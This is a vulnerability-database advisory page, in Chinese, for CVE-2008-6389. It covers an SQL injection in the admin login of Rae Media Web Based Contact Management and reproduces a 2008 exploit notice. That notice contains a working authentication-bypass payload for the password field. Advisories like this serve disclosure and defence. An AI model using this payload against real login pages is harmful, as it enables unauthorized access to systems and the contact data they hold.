Aliensoftcorp Rae Media Web Based Contact Management 'asadmin/default.asp' SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1116920 漏洞类型 SQL注入
发布时间 2008-12-03 更新时间 2009-03-03
CVE编号 CVE-2008-6389 CNNVD-ID CNNVD-200903-043
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/7333
https://cxsecurity.com/issue/WLB-2009030114
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200903-043
|漏洞详情
RaeMediaContactManagement是一个基于ASP和SQLServer的客户联系管理系统。RaeMediaContactManagementSoftware小型家庭版,标准版,以及企业版的asadmin/default.asp中存在SQL注入漏洞。远程攻击者可以借助密码参数,执行任意SQL指令。
|漏洞EXP
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
        +                                                                         +
        + Web Based Contact Management (Auth Bypass) SQL Injection Vulnerability  +
        +                                                                         +
        +                        Discovered by b3hz4d                             +
        +                                                                         +
        +                        WwW.DeltaHacking.Net                             +
        +                                                                         +
        +                                                                         +
        +                                                                         +
        +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
                                  

                              APA Center of Yazd University   
                                 (https://www.ircert.cc)    

		
AUTHOR : b3hz4d (Seyed Behzad Shaghasemi)
DATE   : 03 Dec 2008
SITE   : WwW.DeltaHacking.Net
CONTACT: behzad_sh_66@yahoo.com

#####################################################

APPLICATION   : Web Based Contact Management
DOWNLOAD(199$): http://www.aliensoftcorp.com/contactmanager.htm
VENDOR        : http://www.aliensoftcorp.com/
DEMO          : http://www.aliensoftcorp.com/contactmanager.htm

#####################################################


[+] vuln    : 
              
              Admin login page
              
              All versions (SOHO Version, Standard Version, Enterprise Version) are vulnerable.
              
              All Demo links are here:
              
              http://www.aliensoftcorp.com/contactmanager.htm	  

[+] Exploit : 
              USER: anything

	      PASS: delta' or 'a'='a
 
                
##########################################################################################################

# Greetings: str0ke, Dr.Trojan, Cru3l.b0y, l0pht and all member in DeltaHacking.Net & Snoop-Security.Com #

##########################################################################################################

# milw0rm.com [2008-12-03]
|参考资料

来源:BID
名称:32616
链接:http://www.securityfocus.com/bid/32616
来源:MILW0RM
名称:7333
链接:http://www.milw0rm.com/exploits/7333
来源:SECUNIA
名称:32988
链接:http://secunia.com/advisories/32988